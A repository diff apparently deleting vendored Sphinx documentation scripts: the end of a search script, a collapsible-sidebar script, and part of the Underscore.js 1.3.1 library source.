if (DOCUMENTATION_OPTIONS.FILE_SUFFIX === '') {
// dirhtml builder
var dirname = item[0] + '/';
if (dirname.match(/\/index\/$/)) {
dirname = dirname.substring(0, dirname.length-6);
} else if (dirname == 'index/') {
dirname = '';
}
listItem.append($('<a/>').attr('href',
DOCUMENTATION_OPTIONS.URL_ROOT + dirname +
highlightstring + item[2]).html(item[1]));
} else {
// normal html builders
listItem.append($('<a/>').attr('href',
item[0] + DOCUMENTATION_OPTIONS.FILE_SUFFIX +
highlightstring + item[2]).html(item[1]));
}
if (item[3]) {
listItem.append($('<span> (' + item[3] + ')</span>'));
Search.output.append(listItem);
listItem.slideDown(5, function() {
displayNextItem();
});
} else if (DOCUMENTATION_OPTIONS.HAS_SOURCE) {
$.ajax({url: DOCUMENTATION_OPTIONS.URL_ROOT + '_sources/' + item[0] + '.txt',
dataType: "text",
complete: function(jqxhr, textstatus) {
var data = jqxhr.responseText;
if (data !== '' && data !== undefined) {
listItem.append(Search.makeSearchSummary(data, searchterms, hlterms));
}
Search.output.append(listItem);
listItem.slideDown(5, function() {
displayNextItem();
});
}});
} else {
// no source available, just display title
Search.output.append(listItem);
listItem.slideDown(5, function() {
displayNextItem();
});
}
}
// search finished, update title and status message
else {
Search.stopPulse();
Search.title.text(_('Search Results'));
if (!resultCount)
Search.status.text(_('Your search did not match any documents. Please make sure that all words are spelled correctly and that you\'ve selected enough categories.'));
else
Search.status.text(_('Search finished, found %s page(s) matching the search query.').replace('%s', resultCount));
Search.status.fadeIn(500);
}
}
displayNextItem();
},
/**
* search for object names
*/
performObjectSearch : function(object, otherterms) {
var filenames = this._index.filenames;
var objects = this._index.objects;
var objnames = this._index.objnames;
var titles = this._index.titles;
var i;
var results = [];
for (var prefix in objects) {
for (var name in objects[prefix]) {
var fullname = (prefix ? prefix + '.' : '') + name;
if (fullname.toLowerCase().indexOf(object) > -1) {
var score = 0;
var parts = fullname.split('.');
// check for different match types: exact matches of full name or
// "last name" (i.e. last dotted part)
if (fullname == object || parts[parts.length - 1] == object) {
score += Scorer.objNameMatch;
// matches in last name
} else if (parts[parts.length - 1].indexOf(object) > -1) {
score += Scorer.objPartialMatch;
}
var match = objects[prefix][name];
var objname = objnames[match[1]][2];
var title = titles[match[0]];
// If more than one term searched for, we require other words to be
// found in the name/title/description
if (otherterms.length > 0) {
var haystack = (prefix + ' ' + name + ' ' +
objname + ' ' + title).toLowerCase();
var allfound = true;
for (i = 0; i < otherterms.length; i++) {
if (haystack.indexOf(otherterms[i]) == -1) {
allfound = false;
break;
}
}
if (!allfound) {
continue;
}
}
var descr = objname + _(', in ') + title;
var anchor = match[3];
if (anchor === '')
anchor = fullname;
else if (anchor == '-')
anchor = objnames[match[1]][1] + '-' + fullname;
// add custom score for some objects according to scorer
if (Scorer.objPrio.hasOwnProperty(match[2])) {
score += Scorer.objPrio[match[2]];
} else {
score += Scorer.objPrioDefault;
}
results.push([filenames[match[0]], fullname, '#'+anchor, descr, score]);
}
}
}
return results;
},
/**
* search for full-text terms in the index
*/
performTermsSearch : function(searchterms, excluded, terms, titleterms) {
var filenames = this._index.filenames;
var titles = this._index.titles;
var i, j, file;
var fileMap = {};
var scoreMap = {};
var results = [];
// perform the search on the required terms
for (i = 0; i < searchterms.length; i++) {
var word = searchterms[i];
var files = [];
var _o = [
{files: terms[word], score: Scorer.term},
{files: titleterms[word], score: Scorer.title}
];
// no match but word was a required one
if ($u.every(_o, function(o){return o.files === undefined;})) {
break;
}
// found search word in contents
$u.each(_o, function(o) {
var _files = o.files;
if (_files === undefined)
return
if (_files.length === undefined)
_files = [_files];
files = files.concat(_files);
// set score for the word in each file to Scorer.term
for (j = 0; j < _files.length; j++) {
file = _files[j];
if (!(file in scoreMap))
scoreMap[file] = {}
scoreMap[file][word] = o.score;
}
});
// create the mapping
for (j = 0; j < files.length; j++) {
file = files[j];
if (file in fileMap)
fileMap[file].push(word);
else
fileMap[file] = [word];
}
}
// now check if the files don't contain excluded terms
for (file in fileMap) {
var valid = true;
// check if all requirements are matched
if (fileMap[file].length != searchterms.length)
continue;
// ensure that none of the excluded terms is in the search result
for (i = 0; i < excluded.length; i++) {
if (terms[excluded[i]] == file ||
titleterms[excluded[i]] == file ||
$u.contains(terms[excluded[i]] || [], file) ||
$u.contains(titleterms[excluded[i]] || [], file)) {
valid = false;
break;
}
}
// if we have still a valid result we can add it to the result list
if (valid) {
// select one (max) score for the file.
// for better ranking, we should calculate ranking by using words statistics like basic tf-idf...
var score = $u.max($u.map(fileMap[file], function(w){return scoreMap[file][w]}));
results.push([filenames[file], titles[file], '', null, score]);
}
}
return results;
},
/**
* helper function to return a node containing the
* search summary for a given text. keywords is a list
* of stemmed words, hlwords is the list of normal, unstemmed
* words. the first one is used to find the occurance, the
* latter for highlighting it.
*/
makeSearchSummary : function(text, keywords, hlwords) {
var textLower = text.toLowerCase();
var start = 0;
$.each(keywords, function() {
var i = textLower.indexOf(this.toLowerCase());
if (i > -1)
start = i;
});
start = Math.max(start - 120, 0);
var excerpt = ((start > 0) ? '...' : '') +
$.trim(text.substr(start, 240)) +
((start + 240 - text.length) ? '...' : '');
var rv = $('<div class="context"></div>').text(excerpt);
$.each(hlwords, function() {
rv = rv.highlightText(this, 'highlighted');
});
return rv;
}
};
$(document).ready(function() {
Search.init();
});

159
docs/build/html/_static/sidebar.js vendored
Unescape View File

@ -1,159 +0,0 @@
/*
* sidebar.js
* ~~~~~~~~~~
*
* This script makes the Sphinx sidebar collapsible.
*
* .sphinxsidebar contains .sphinxsidebarwrapper. This script adds
* in .sphixsidebar, after .sphinxsidebarwrapper, the #sidebarbutton
* used to collapse and expand the sidebar.
*
* When the sidebar is collapsed the .sphinxsidebarwrapper is hidden
* and the width of the sidebar and the margin-left of the document
* are decreased. When the sidebar is expanded the opposite happens.
* This script saves a per-browser/per-session cookie used to
* remember the position of the sidebar among the pages.
* Once the browser is closed the cookie is deleted and the position
* reset to the default (expanded).
*
* :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
* :license: BSD, see LICENSE for details.
*
*/
$(function() {
// global elements used by the functions.
// the 'sidebarbutton' element is defined as global after its
// creation, in the add_sidebar_button function
var bodywrapper = $('.bodywrapper');
var sidebar = $('.sphinxsidebar');
var sidebarwrapper = $('.sphinxsidebarwrapper');
// for some reason, the document has no sidebar; do not run into errors
if (!sidebar.length) return;
// original margin-left of the bodywrapper and width of the sidebar
// with the sidebar expanded
var bw_margin_expanded = bodywrapper.css('margin-left');
var ssb_width_expanded = sidebar.width();
// margin-left of the bodywrapper and width of the sidebar
// with the sidebar collapsed
var bw_margin_collapsed = '.8em';
var ssb_width_collapsed = '.8em';
// colors used by the current theme
var dark_color = $('.related').css('background-color');
var light_color = $('.document').css('background-color');
function sidebar_is_collapsed() {
return sidebarwrapper.is(':not(:visible)');
}
function toggle_sidebar() {
if (sidebar_is_collapsed())
expand_sidebar();
else
collapse_sidebar();
}
function collapse_sidebar() {
sidebarwrapper.hide();
sidebar.css('width', ssb_width_collapsed);
bodywrapper.css('margin-left', bw_margin_collapsed);
sidebarbutton.css({
'margin-left': '0',
'height': bodywrapper.height()
});
sidebarbutton.find('span').text('»');
sidebarbutton.attr('title', _('Expand sidebar'));
document.cookie = 'sidebar=collapsed';
}
function expand_sidebar() {
bodywrapper.css('margin-left', bw_margin_expanded);
sidebar.css('width', ssb_width_expanded);
sidebarwrapper.show();
sidebarbutton.css({
'margin-left': ssb_width_expanded-12,
'height': bodywrapper.height()
});
sidebarbutton.find('span').text('«');
sidebarbutton.attr('title', _('Collapse sidebar'));
document.cookie = 'sidebar=expanded';
}
function add_sidebar_button() {
sidebarwrapper.css({
'float': 'left',
'margin-right': '0',
'width': ssb_width_expanded - 28
});
// create the button
sidebar.append(
'<div id="sidebarbutton"><span>&laquo;</span></div>'
);
var sidebarbutton = $('#sidebarbutton');
light_color = sidebarbutton.css('background-color');
// find the height of the viewport to center the '<<' in the page
var viewport_height;
if (window.innerHeight)
viewport_height = window.innerHeight;
else
viewport_height = $(window).height();
sidebarbutton.find('span').css({
'display': 'block',
'margin-top': (viewport_height - sidebar.position().top - 20) / 2
});
sidebarbutton.click(toggle_sidebar);
sidebarbutton.attr('title', _('Collapse sidebar'));
sidebarbutton.css({
'color': '#FFFFFF',
'border-left': '1px solid ' + dark_color,
'font-size': '1.2em',
'cursor': 'pointer',
'height': bodywrapper.height(),
'padding-top': '1px',
'margin-left': ssb_width_expanded - 12
});
sidebarbutton.hover(
function () {
$(this).css('background-color', dark_color);
},
function () {
$(this).css('background-color', light_color);
}
);
}
function set_position_from_cookie() {
if (!document.cookie)
return;
var items = document.cookie.split(';');
for(var k=0; k<items.length; k++) {
var key_val = items[k].split('=');
var key = key_val[0].replace(/ /, ""); // strip leading spaces
if (key == 'sidebar') {
var value = key_val[1];
if ((value == 'collapsed') && (!sidebar_is_collapsed()))
collapse_sidebar();
else if ((value == 'expanded') && (sidebar_is_collapsed()))
expand_sidebar();
}
}
}
add_sidebar_button();
var sidebarbutton = $('#sidebarbutton');
set_position_from_cookie();
});

999
docs/build/html/_static/underscore-1.3.1.js vendored
Unescape View File

@ -1,999 +0,0 @@
// Underscore.js 1.3.1
// (c) 2009-2012 Jeremy Ashkenas, DocumentCloud Inc.
// Underscore is freely distributable under the MIT license.
// Portions of Underscore are inspired or borrowed from Prototype,
// Oliver Steele's Functional, and John Resig's Micro-Templating.
// For all details and documentation:
// http://documentcloud.github.com/underscore
(function() {
// Baseline setup
// --------------
// Establish the root object, `window` in the browser, or `global` on the server.
var root = this;
// Save the previous value of the `_` variable.
var previousUnderscore = root._;
// Establish the object that gets returned to break out of a loop iteration.
var breaker = {};
// Save bytes in the minified (but not gzipped) version:
var ArrayProto = Array.prototype, ObjProto = Object.prototype, FuncProto = Function.prototype;
// Create quick reference variables for speed access to core prototypes.
var slice = ArrayProto.slice,
unshift = ArrayProto.unshift,
toString = ObjProto.toString,
hasOwnProperty = ObjProto.hasOwnProperty;
// All **ECMAScript 5** native function implementations that we hope to use
// are declared here.
var
nativeForEach = ArrayProto.forEach,
nativeMap = ArrayProto.map,
nativeReduce = ArrayProto.reduce,
nativeReduceRight = ArrayProto.reduceRight,
nativeFilter = ArrayProto.filter,
nativeEvery = ArrayProto.every,
nativeSome = ArrayProto.some,
nativeIndexOf = ArrayProto.indexOf,
nativeLastIndexOf = ArrayProto.lastIndexOf,
nativeIsArray = Array.isArray,
nativeKeys = Object.keys,
nativeBind = FuncProto.bind;
// Create a safe reference to the Underscore object for use below.
var _ = function(obj) { return new wrapper(obj); };
// Export the Underscore object for **Node.js**, with
// backwards-compatibility for the old `require()` API. If we're in
// the browser, add `_` as a global object via a string identifier,
// for Closure Compiler "advanced" mode.
if (typeof exports !== 'undefined') {
if (typeof module !== 'undefined' && module.exports) {
exports = module.exports = _;
}
exports._ = _;
} else {
root['_'] = _;
}
// Current version.
_.VERSION = '1.3.1';
// Collection Functions
// --------------------
// The cornerstone, an `each` implementation, aka `forEach`.
// Handles objects with the built-in `forEach`, arrays, and raw objects.
// Delegates to **ECMAScript 5**'s native `forEach` if available.
var each = _.each = _.forEach = function(obj, iterator, context) {
if (obj == null) return;
if (nativeForEach && obj.forEach === nativeForEach) {
obj.forEach(iterator, context);
} else if (obj.length === +obj.length) {
for (var i = 0, l = obj.length; i < l; i++) {
if (i in obj && iterator.call(context, obj[i], i, obj) === breaker) return;
}
} else {
for (var key in obj) {
if (_.has(obj, key)) {
if (iterator.call(context, obj[key], key, obj) === breaker) return;
}
}
}
};
// Return the results of applying the iterator to each element.
// Delegates to **ECMAScript 5**'s native `map` if available.
_.map = _.collect = function(obj, iterator, context) {
var results = [];
if (obj == null) return results;
if (nativeMap && obj.map === nativeMap) return obj.map(iterator, context);
each(obj, function(value, index, list) {
results[results.length] = iterator.call(context, value, index, list);
});
if (obj.length === +obj.length) results.length = obj.length;
return results;
};
// **Reduce** builds up a single result from a list of values, aka `inject`,
// or `foldl`. Delegates to **ECMAScript 5**'s native `reduce` if available.
_.reduce = _.foldl = _.inject = function(obj, iterator, memo, context) {
var initial = arguments.length > 2;
if (obj == null) obj = [];
if (nativeReduce && obj.reduce === nativeReduce) {
if (context) iterator = _.bind(iterator, context);
return initial ? obj.reduce(iterator, memo) : obj.reduce(iterator);
}
each(obj, function(value, index, list) {
if (!initial) {
memo = value;
initial = true;
} else {
memo = iterator.call(context, memo, value, index, list);
}
});
if (!initial) throw new TypeError('Reduce of empty array with no initial value');
return memo;
};
// The right-associative version of reduce, also known as `foldr`.
// Delegates to **ECMAScript 5**'s native `reduceRight` if available.
_.reduceRight = _.foldr = function(obj, iterator, memo, context) {
var initial = arguments.length > 2;
if (obj == null) obj = [];
if (nativeReduceRight && obj.reduceRight === nativeReduceRight) {
if (context) iterator = _.bind(iterator, context);
return initial ? obj.reduceRight(iterator, memo) : obj.reduceRight(iterator);
}
var reversed = _.toArray(obj).reverse();
if (context && !initial) iterator = _.bind(iterator, context);
return initial ? _.reduce(reversed, iterator, memo, context) : _.reduce(reversed, iterator);
};
// Return the first value which passes a truth test. Aliased as `detect`.
_.find = _.detect = function(obj, iterator, context) {
var result;
any(obj, function(value, index, list) {
if (iterator.call(context, value, index, list)) {
result = value;
return true;
}
});
return result;
};
// Return all the elements that pass a truth test.
// Delegates to **ECMAScript 5**'s native `filter` if available.
// Aliased as `select`.
_.filter = _.select = function(obj, iterator, context) {
var results = [];
if (obj == null) return results;
if (nativeFilter && obj.filter === nativeFilter) return obj.filter(iterator, context);
each(obj, function(value, index, list) {
if (iterator.call(context, value, index, list)) results[results.length] = value;
});
return results;
};
// Return all the elements for which a truth test fails.
_.reject = function(obj, iterator, context) {
var results = [];
if (obj == null) return results;
each(obj, function(value, index, list) {
if (!iterator.call(context, value, index, list)) results[results.length] = value;
});
return results;
};
// Determine whether all of the elements match a truth test.
// Delegates to **ECMAScript 5**'s native `every` if available.
// Aliased as `all`.
_.every = _.all = function(obj, iterator, context) {
var result = true;
if (obj == null) return result;
if (nativeEvery && obj.every === nativeEvery) return obj.every(iterator, context);
each(obj, function(value, index, list) {
if (!(result = result && iterator.call(context, value, index, list))) return breaker;
});
return result;
};
// Determine if at least one element in the object matches a truth test.
// Delegates to **ECMAScript 5**'s native `some` if available.
// Aliased as `any`.
var any = _.some = _.any = function(obj, iterator, context) {
iterator || (iterator = _.identity);
var result = false;
if (obj == null) return result;
if (nativeSome && obj.some === nativeSome) return obj.some(iterator, context);
each(obj, function(value, index, list) {
if (result || (result = iterator.call(context, value, index, list))) return breaker;
});
return !!result;
};
// Determine if a given value is included in the array or object using `===`.
// Aliased as `contains`.
_.include = _.contains = function(obj, target) {
var found = false;
if (obj == null) return found;
if (nativeIndexOf && obj.indexOf === nativeIndexOf) return obj.indexOf(target) != -1;
found = any(obj, function(value) {
return value === target;
});
return found;
};
// Invoke a method (with arguments) on every item in a collection.
_.invoke = function(obj, method) {
var args = slice.call(arguments, 2);
return _.map(obj, function(value) {
return (_.isFunction(method) ? method || value : value[method]).apply(value, args);
});
};
// Convenience version of a common use case of `map`: fetching a property.
_.pluck = function(obj, key) {
return _.map(obj, function(value){ return value[key]; });
};
// Return the maximum element or (element-based computation).
_.max = function(obj, iterator, context) {
if (!iterator && _.isArray(obj)) return Math.max.apply(Math, obj);
if (!iterator && _.isEmpty(obj)) return -Infinity;
var result = {computed : -Infinity};
each(obj, function(value, index, list) {
var computed = iterator ? iterator.call(context, value, index, list) : value;
computed >= result.computed && (result = {value : value, computed : computed});
});
return result.value;
};
// Return the minimum element (or element-based computation).
_.min = function(obj, iterator, context) {
if (!iterator && _.isArray(obj)) return Math.min.apply(Math, obj);
if (!iterator && _.isEmpty(obj)) return Infinity;
var result = {computed : Infinity};
each(obj, function(value, index, list) {
var computed = iterator ? iterator.call(context, value, index, list) : value;
computed < result.computed && (result = {value : value, computed : computed});
});
return result.value;
};
// Shuffle an array.
_.shuffle = function(obj) {
var shuffled = [], rand;
each(obj, function(value, index, list) {
if (index == 0) {
shuffled[0] = value;
} else {
rand = Math.floor(Math.random() * (index + 1));
shuffled[index] = shuffled[rand];
shuffled[rand] = value;
}
});
return shuffled;
};
// Sort the object's values by a criterion produced by an iterator.
_.sortBy = function(obj, iterator, context) {
return _.pluck(_.map(obj, function(value, index, list) {
return {
value : value,
criteria : iterator.call(context, value, index, list)
};
}).sort(function(left, right) {
var a = left.criteria, b = right.criteria;
return a < b ? -1 : a > b ? 1 : 0;
}), 'value');
};
// Groups the object's values by a criterion. Pass either a string attribute
// to group by, or a function that returns the criterion.
_.groupBy = function(obj, val) {
var result = {};
var iterator = _.isFunction(val) ? val : function(obj) { return obj[val]; };
each(obj, function(value, index) {
var key = iterator(value, index);
(result[key] || (result[key] = [])).push(value);
});
return result;
};
// Use a comparator function to figure out at what index an object should
// be inserted so as to maintain order. Uses binary search.
_.sortedIndex = function(array, obj, iterator) {
iterator || (iterator = _.identity);
var low = 0, high = array.length;
while (low < high) {
var mid = (low + high) >> 1;
iterator(array[mid]) < iterator(obj) ? low = mid + 1 : high = mid;
}
return low;
};
// Safely convert anything iterable into a real, live array.
_.toArray = function(iterable) {
if (!iterable) return [];
if (iterable.toArray) return iterable.toArray();
if (_.isArray(iterable)) return slice.call(iterable);
if (_.isArguments(iterable)) return slice.call(iterable);
return _.values(iterable);
};
// Return the number of elements in an object.
_.size = function(obj) {
return _.toArray(obj).length;
};
// Array Functions
// ---------------
// Get the first element of an array. Passing **n** will return the first N
// values in the array. Aliased as `head`. The **guard** check allows it to work
// with `_.map`.
_.first = _.head = function(array, n, guard) {
return (n != null) && !guard ? slice.call(array, 0, n) : array[0];
};
// Returns everything but the last entry of the array. Especcialy useful on
// the arguments object. Passing **n** will return all the values in
// the array, excluding the last N. The **guard** check allows it to work with
// `_.map`.
_.initial = function(array, n, guard) {
return slice.call(array, 0, array.length - ((n == null) || guard ? 1 : n));
};
// Get the last element of an array. Passing **n** will return the last N
// values in the array. The **guard** check allows it to work with `_.map`.
_.last = function(array, n, guard) {
if ((n != null) && !guard) {
return slice.call(array, Math.max(array.length - n, 0));
} else {
return array[array.length - 1];
}
};
// Returns everything but the first entry of the array. Aliased as `tail`.
// Especially useful on the arguments object. Passing an **index** will return
// the rest of the values in the array from that index onward. The **guard**
// check allows it to work with `_.map`.
_.rest = _.tail = function(array, index, guard) {
return slice.call(array, (index == null) || guard ? 1 : index);
};
// Trim out all falsy values from an array.
_.compact = function(array) {
return _.filter(array, function(value){ return !!value; });
};
// Return a completely flattened version of an array.
_.flatten = function(array, shallow) {
return _.reduce(array, function(memo, value) {
if (_.isArray(value)) return memo.concat(shallow ? value : _.flatten(value));
memo[memo.length] = value;
return memo;
}, []);
};
// Return a version of the array that does not contain the specified value(s).
_.without = function(array) {
return _.difference(array, slice.call(arguments, 1));
};
// Produce a duplicate-free version of the array. If the array has already
// been sorted, you have the option of using a faster algorithm.
// Aliased as `unique`.
_.uniq = _.unique = function(array, isSorted, iterator) {
var initial = iterator ? _.map(array, iterator) : array;
var result = [];
_.reduce(initial, function(memo, el, i) {
if (0 == i || (isSorted === true ? _.last(memo) != el : !_.include(memo, el))) {
memo[memo.length] = el;
result[result.length] = array[i];
}
return memo;
}, []);
return result;
};
// Produce an array that contains the union: each distinct element from all of
// the passed-in arrays.
_.union = function() {
return _.uniq(_.flatten(arguments, true));
};
// Produce an array that contains every item shared between all the
// passed-in arrays. (Aliased as "intersect" for back-compat.)
_.intersection = _.intersect = function(array) {
var rest = slice.call(arguments, 1);
return _.filter(_.uniq(array), function(item) {
return _.every(rest, function(other) {
return _.indexOf(other, item) >= 0;
});
});
};
// Take the difference between one array and a number of other arrays.
// Only the elements present in just the first array will remain.
_.difference = function(array) {
var rest = _.flatten(slice.call(arguments, 1));
return _.filter(array, function(value){ return !_.include(rest, value); });
};
// Zip together multiple lists into a single array -- elements that share
// an index go together.
_.zip = function() {
var args = slice.call(arguments);
var length = _.max(_.pluck(args, 'length'));
var results = new Array(length);
for (var i = 0; i < length; i++) results[i] = _.pluck(args, "" + i);
return results;
};
// If the browser doesn't supply us with indexOf (I'm looking at you, **MSIE**),
// we need this function. Return the position of the first occurrence of an
// item in an array, or -1 if the item is not included in the array.
// Delegates to **ECMAScript 5**'s native `indexOf` if available.
// If the array is large and already in sort order, pass `true`
// for **isSorted** to use binary search.
_.indexOf = function(array, item, isSorted) {
if (array == null) return -1;
var i, l;
if (isSorted) {
i = _.sortedIndex(array, item);
return array[i] === item ? i : -1;
}
if (nativeIndexOf && array.indexOf === nativeIndexOf) return array.indexOf(item);
for (i = 0, l = array.length; i < l; i++) if (i in array && array[i] === item) return i;
return -1;
};
// Delegates to **ECMAScript 5**'s native `lastIndexOf` if available.
_.lastIndexOf = function(array, item) {
if (array == null) return -1;
if (nativeLastIndexOf && array.lastIndexOf === nativeLastIndexOf) return array.lastIndexOf(item);
var i = array.length;
while (i--) if (i in array && array[i] === item) return i;
return -1;
};
// Generate an integer Array containing an arithmetic progression. A port of
// the native Python `range()` function. See
// [the Python documentation](http://docs.python.org/library/functions.html#range).
_.range = function(start, stop, step) {
if (arguments.length <= 1) {
stop = start || 0;
start = 0;
}
step = arguments[2] || 1;
var len = Math.max(Math.ceil((stop - start) / step), 0);
var idx = 0;
var range = new Array(len);
while(idx < len) {
range[idx++] = start;
start += step;
}
return range;
};
// Function (ahem) Functions
// ------------------
// Reusable constructor function for prototype setting.
var ctor = function(){};
// Create a function bound to a given object (assigning `this`, and arguments,
// optionally). Binding with arguments is also known as `curry`.
// Delegates to **ECMAScript 5**'s native `Function.bind` if available.
// We check for `func.bind` first, to fail fast when `func` is undefined.
_.bind = function bind(func, context) {
var bound, args;
if (func.bind === nativeBind && nativeBind) return nativeBind.apply(func, slice.call(arguments, 1));
if (!_.isFunction(func)) throw new TypeError;
args = slice.call(arguments, 2);
return bound = function() {
if (!(this instanceof bound)) return func.apply(context, args.concat(slice.call(arguments)));
ctor.prototype = func.prototype;
var self = new ctor;
var result = func.apply(self, args.concat(slice.call(arguments)));
if (Object(result) === result) return result;
return self;
};
};
// Bind all of an object's methods to that object. Useful for ensuring that
// all callbacks defined on an object belong to it.
_.bindAll = function(obj) {
var funcs = slice.call(arguments, 1);
if (funcs.length == 0) funcs = _.functions(obj);
each(funcs, function(f) { obj[f] = _.bind(obj[f], obj); });
return obj;
};
// Memoize an expensive function by storing its results.
_.memoize = function(func, hasher) {
var memo = {};
hasher || (hasher = _.identity);
return function() {
var key = hasher.apply(this, arguments);
return _.has(memo, key) ? memo[key] : (memo[key] = func.apply(this, arguments));
};
};
// Delays a function for the given number of milliseconds, and then calls
// it with the arguments supplied.
_.delay = function(func, wait) {
var args = slice.call(arguments, 2);
return setTimeout(function(){ return func.apply(func, args); }, wait);
};
// Defers a function, scheduling it to run after the current call stack has
// cleared.
_.defer = function(func) {
return _.delay.apply(_, [func, 1].concat(slice.call(arguments, 1)));
};
// Returns a function, that, when invoked, will only be triggered at most once
// during a given window of time.
_.throttle = function(func, wait) {
var context, args, timeout, throttling, more;
var whenDone = _.debounce(function(){ more = throttling = false; }, wait);
return function() {
context = this; args = arguments;
var later = function() {
timeout = null;
if (more) func.apply(context, args);
whenDone();
};
if (!timeout) timeout = setTimeout(later, wait);
if (throttling) {
more = true;
} else {
func.apply(context, args);
}
whenDone();
throttling = true;
};
};
// Returns a function, that, as long as it continues to be invoked, will not
// be triggered. The function will be called after it stops being called for
// N milliseconds.
_.debounce = function(func, wait) {
var timeout;
return function() {
var context = this, args = arguments;
var later = function() {
timeout = null;
func.apply(context, args);
};
clearTimeout(timeout);
timeout = setTimeout(later, wait);
};
};
// Returns a function that will be executed at most one time, no matter how
// often you call it. Useful for lazy initialization.
_.once = function(func) {
var ran = false, memo;
return function() {
if (ran) return memo;
ran = true;
return memo = func.apply(this, arguments);
};
};
// Returns the first function passed as an argument to the second,
// allowing you to adjust arguments, run code before and after, and
// conditionally execute the original function.
_.wrap = function(func, wrapper) {
return function() {
var args = [func].concat(slice.call(arguments, 0));
return wrapper.apply(this, args);
};
};
// Returns a function that is the composition of a list of functions, each
// consuming the return value of the function that follows.
_.compose = function() {
var funcs = arguments;
return function() {
var args = arguments;
for (var i = funcs.length - 1; i >= 0; i--) {
args = [funcs[i].apply(this, args)];
}
return args[0];
};
};
// Returns a function that will only be executed after being called N times.
_.after = function(times, func) {
if (times <= 0) return func();
return function() {
if (--times < 1) { return func.apply(this, arguments); }
};
};
// Object Functions
// ----------------
// Retrieve the names of an object's properties.
// Delegates to **ECMAScript 5**'s native `Object.keys`
_.keys = nativeKeys || function(obj) {
if (obj !== Object(obj)) throw new TypeError('Invalid object');
var keys = [];
for (var key in obj) if (_.has(obj, key)) keys[keys.length] = key;
return keys;
};
// Retrieve the values of an object's properties.
_.values = function(obj) {
return _.map(obj, _.identity);
};
// Return a sorted list of the function names available on the object.
// Aliased as `methods`
_.functions = _.methods = function(obj) {
var names = [];
for (var key in obj) {
if (_.isFunction(obj[key])) names.push(key);
}
return names.sort();
};
// Extend a given object with all the properties in passed-in object(s).
_.extend = function(obj) {
each(slice.call(arguments, 1), function(source) {
for (var prop in source) {
obj[prop] = source[prop];
}
});
return obj;
};
// Fill in a given object with default properties.
_.defaults = function(obj) {
each(slice.call(arguments, 1), function(source) {
for (var prop in source) {
if (obj[prop] == null) obj[prop] = source[prop];
}
});
return obj;
};
// Create a (shallow-cloned) duplicate of an object.
_.clone = function(obj) {
if (!_.isObject(obj)) return obj;
return _.isArray(obj) ? obj.slice() : _.extend({}, obj);
};
// Invokes interceptor with the obj, and then returns obj.
// The primary purpose of this method is to "tap into" a method chain, in
// order to perform operations on intermediate results within the chain.
_.tap = function(obj, interceptor) {
interceptor(obj);
return obj;
};
// Internal recursive comparison function.
function eq(a, b, stack) {
// Identical objects are equal. `0 === -0`, but they aren't identical.
// See the Harmony `egal` proposal: http://wiki.ecmascript.org/doku.php?id=harmony:egal.
if (a === b) return a !== 0 || 1 / a == 1 / b;
// A strict comparison is necessary because `null == undefined`.
if (a == null || b == null) return a === b;
// Unwrap any wrapped objects.
if (a._chain) a = a._wrapped;
if (b._chain) b = b._wrapped;
// Invoke a custom `isEqual` method if one is provided.
if (a.isEqual && _.isFunction(a.isEqual)) return a.isEqual(b);
if (b.isEqual && _.isFunction(b.isEqual)) return b.isEqual(a);
// Compare `[[Class]]` names.
var className = toString.call(a);
if (className != toString.call(b)) return false;
switch (className) {
// Strings, numbers, dates, and booleans are compared by value.
case '[object String]':
// Primitives and their corresponding object wrappers are equivalent; thus, `"5"` is
// equivalent to `new String("5")`.
return a == String(b);
case '[object Number]':
// `NaN`s are equivalent, but non-reflexive. An `egal` comparison is performed for
// other numeric values.
return a != +a ? b != +b : (a == 0 ? 1 / a == 1 / b : a == +b);
case '[object Date]':
case '[object Boolean]':
// Coerce dates and booleans to numeric primitive values. Dates are compared by their
// millisecond representations. Note that invalid dates with millisecond representations
// of `NaN` are not equivalent.
return +a == +b;
// RegExps are compared by their source patterns and flags.
case '[object RegExp]':
return a.source == b.source &&
a.global == b.global &&
a.multiline == b.multiline &&
a.ignoreCase == b.ignoreCase;
}
if (typeof a != 'object' || typeof b != 'object') return false;
// Assume equality for cyclic structures. The algorithm for detecting cyclic
// structures is adapted from ES 5.1 section 15.12.3, abstract operation `JO`.
var length = stack.length;
while (length--) {
// Linear search. Performance is inversely proportional to the number of
// unique nested structures.
if (stack[length] == a) return true;
}
// Add the first object to the stack of traversed objects.
stack.push(a);
var size = 0, result = true;
// Recursively compare objects and arrays.
if (className == '[object Array]') {
// Compare array lengths to determine if a deep comparison is necessary.
size = a.length;
result = size == b.length;
if (result) {
// Deep compare the contents, ignoring non-numeric properties.
while (size--) {
// Ensure commutative equality for sparse arrays.
if (!(result = size in a == size in b && eq(a[size], b[size], stack))) break;
}
}
} else {
// Objects with different constructors are not equivalent.
if ('constructor' in a != 'constructor' in b || a.constructor != b.constructor) return false;
// Deep compare objects.
for (var key in a) {
if (_.has(a, key)) {
// Count the expected number of properties.
size++;
// Deep compare each member.
if (!(result = _.has(b, key) && eq(a[key], b[key], stack))) break;
}
}
// Ensure that both objects contain the same number of properties.
if (result) {
for (key in b) {
if (_.has(b, key) && !(size--)) break;
}
result = !size;
}
}
// Remove the first object from the stack of traversed objects.
stack.pop();
return result;
}
// Perform a deep comparison to check if two objects are equal.
_.isEqual = function(a, b) {
return eq(a, b, []);
};
// Is a given array, string, or object empty?
// An "empty" object has no enumerable own-properties.
_.isEmpty = function(obj) {
if (_.isArray(obj) || _.isString(obj)) return obj.length === 0;
for (var key in obj) if (_.has(obj, key)) return false;
return true;
};
// Is a given value a DOM element?
_.isElement = function(obj) {
return !!(obj && obj.nodeType == 1);
};
// Is a given value an array?
// Delegates to ECMA5's native Array.isArray
_.isArray = nativeIsArray || function(obj) {
return toString.call(obj) == '[object Array]';
};
// Is a given variable an object?
_.isObject = function(obj) {
return obj === Object(obj);
};
// Is a given variable an arguments object?
_.isArguments = function(obj) {
return toString.call(obj) == '[object Arguments]';
};
if (!_.isArguments(arguments)) {
_.isArguments = function(obj) {
return !!(obj && _.has(obj, 'callee'));
};
}
// Is a given value a function?
_.isFunction = function(obj) {
return toString.call(obj) == '[object Function]';
};
// Is a given value a string?
_.isString = function(obj) {
return toString.call(obj) == '[object String]';
};
// Is a given value a number?
_.isNumber = function(obj) {
return toString.call(obj) == '[object Number]';
};
// Is the given value `NaN`?
_.isNaN = function(obj) {
// `NaN` is the only value for which `===` is not reflexive.
return obj !== obj;
};
// Is a given value a boolean?
_.isBoolean = function(obj) {
return obj === true || obj === false || toString.call(obj) == '[object Boolean]';
};
// Is a given value a date?
_.isDate = function(obj) {
return toString.call(obj) == '[object Date]';
};
